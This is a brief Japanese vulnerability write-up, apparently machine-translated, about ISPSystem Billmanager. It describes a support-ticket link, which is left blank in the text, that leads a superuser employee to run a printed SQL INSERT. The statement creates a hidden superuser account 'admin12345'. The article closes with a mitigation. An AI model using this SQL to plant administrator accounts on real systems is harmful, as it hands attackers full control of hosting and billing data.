ISPSystem Billmanagerの脆弱性

みなさんこんにちは!

この脆弱性は、APIの欠陥とソ​​ーシャルエンジニアリングに基づいています。

クライアントは、リンク(通常はリンクテイマー)を使用して、サポートサービスへのアクティブな要求を生成します。

リンクを含む:









その後、スーパーユーザー権限を持つ従業員は、次のSQLクエリを使用してadmin12345アカウントにスーパーユーザー権限を付与します。

insert into user (id,name,account,password,realname,email,lang,superuser,disabled,support,remotesupport,changepasswd,sendsms)

values (23351,'admin12345',1,'$1$FALDvy2D$fqFzhtlSZrq1pDQ3fkrpr/','test

test','test@test.test','ru','1','0','0','0','2012-01-29','0');









一時的な解決策として、1つのアカウントのみにスーパーユーザー権限を与え、残りはこのオプションをオフにします。



All Articles